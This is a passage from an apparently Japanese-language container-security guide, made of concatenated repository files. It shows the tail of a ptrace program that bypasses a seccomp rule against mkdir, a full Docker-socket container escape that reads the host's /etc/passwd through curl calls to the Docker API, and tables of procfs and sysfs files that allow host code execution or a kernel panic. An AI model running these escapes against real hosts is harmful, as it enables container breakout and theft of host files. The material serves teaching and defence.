    // syscall-enter-stop であればスキップ
    if (regs.rax != -ENOSYS) {
      continue;
    }

    // レジスタの内容を変更してシステムコールを変更する
    if (regs.orig_rax == SYS_getpid) {
      regs.orig_rax = regs.rdi;
      regs.rdi = regs.rsi;
      regs.rsi = regs.rdx;
      regs.rdx = regs.r10;
      regs.r10 = regs.r8;
      regs.r8 = regs.r9;
      regs.r9 = 0;
      ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    }
  }
  return 0;
}
```

`mkdir(2)` を禁止する seccomp profile を適用したコンテナを作成します。

```sh
$ cat seccomp.json | jq 
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "name": "mkdir",
      "action": "SCMP_ACT_ERRNO",
      "args": []
    }
  ]
}

$ docker run -it --security-opt seccomp:seccomp.json ubuntu:latest bash
```

そのコンテナの中で上記コードを実行すると seccomp の制限をバイパスして `mkdir(2)` を実行することが確認できます。

```sh
[root@d7799354119f tmp]# mkdir dir
mkdir: cannot create directory 'dir': Operation not permitted

[root@d7799354119f tmp]# ./a.out
orig_rax = 39
orig_rax = 83
orig_rax = 231
[root@d75f3506a41d tmp]# ls
a.out  dir
```


================================================
FILE: source/security/sensitive-file-mount.md
================================================
# Sensitive File Mount

コンテナに特定のファイルをマウントした場合に、ホスト側にエスケープできるケースがあります。

## Docker Socket

Docker Daemon と通信を行うソケットをコンテナにマウントすると、コンテナから任意の HTTP リクエストを送信できるため、ホスト側にエスケープすることができます。

```sh
ubuntu@docker:~$ docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest bash
# コンテナ一覧を取得できる
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock http:/v1.24/containers/json
[{"Id":"3ba2c2752b264486b24d5ae00c2a4b6d00b341fe8001f1e703ecadd4ee44655e","Names":["/eager_wozniak"],"Image":"ubuntu:latest","ImageID":"sha256:bb0eaf4eee00c28cb8ffd54e571dd225f1dd2ed8d8751b2835c31e84188bf2de","Command":"bash","Created":1605360446,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"fdc64dc8a87c0c6a25e6186c5713f03c36a6be049d9a800d745a4d0c7e6c93de","EndpointID":"609757590f10f891224587c9f48abbf3f243705660c98cfb8489aa5cecf29f51","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

# host の / をマウントしたコンテナを作成
root@3ba2c2752b26:/# curl -L --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://v1.24/containers/create
{"Id":"8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f","Warnings":[]}
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' http:/v1.24/containers/8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f/start

# cat /hostos/etc/passwd を実行
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http:/v1.24/containers/8e15f2d344fa7bf9588f82a097e7c506429b936e85bc2a60350a018a7277403f/exec
{"Id":"0dd4ef3a6b6f63327ef950f9b90d6908006221160f8c2866ed4a8ca4d6e594fb"}
root@3ba2c2752b26:/# curl -L -i --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://v1.24/exec/0dd4ef3a6b6f63327ef950f9b90d6908006221160f8c2866ed4a8ca4d6e594fb/start --output /tmp/output
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1831    0  1801  100    30  19159    319 --:--:-- --:--:-- --:--:-- 19478

# 取得できていることが確認できる
root@3ba2c2752b26:/# cat /tmp/output
HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Api-Version: 1.40
Docker-Experimental: false
Ostype: linux
Server: Docker/19.03.13 (linux)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```

## procfs と sysfs

procfs や sysfs はカーネルパラメータを設定したりできる機能が提供されているため、これらを利用してホスト側にエスケープしたり、ホスト側の情報を引き出すことができます。  
Docker や LXC では、このような特定のファイルは ReadOnly あるいは `/dev/null` としてマウントされていますが、もしアクセスが可能な場合をみていきます。

![readonly mount](./img/procfs-readonly-mount.png)

### procfs

| ファイル | 概要 |
|:--------:|:----:|
| `/proc/sys/kernel/core_pattern` | core ファイルの名前を指定できる。パイプが利用できるため、ホスト側での任意コード実行に繋げることが可能。|
| `/proc/sys/fs/binfmt_misc` | 指定した拡張子やマジックナンバーを持つファイルを実行する際のインタプリタを指定できる。コンテナ内のファイルを指定することで、ホスト側で対応したファイル実行時にエスケープにつながる。|
| `/proc/sysrq-trigger` | Sysrq コマンドを扱うファイル。例えばコンテナから文字列 `c` をこのファイルに書き込むことでホストにカーネルパニックを起こせる。|
| `/proc/sched_debug` | プロセスのスケジュール管理情報を持っているファイル。全ての namespace のプロセス名が含まれるため、ホストのプロセスも確認できる。 |

上記以外にも `/proc/kcore` や `/proc/kallsyms` など、コンテナから閲覧されない方が良いファイルが多数あります。

### sysfs

| ファイル | 概要 |
|:--------:|:----:|
| `/sys/kernel/uevent_helper` | uevent が発生した際に実行するプログラムを指定できる。コンテナで uevent を発生させることで、ホスト側での任意コード実行に繋げることが可能。|
| `/sys/kernel/vmcoreinfo` | カーネルのアドレスリークにつながる |


================================================
FILE: source/styles/website.css
================================================
.markdown-section blockquote {
    width: 100%;
    border-left: 4px solid #3884ff;
    border-radius: 0.3rem;
}

blockquote blockquote {
    padding-right: 0;
}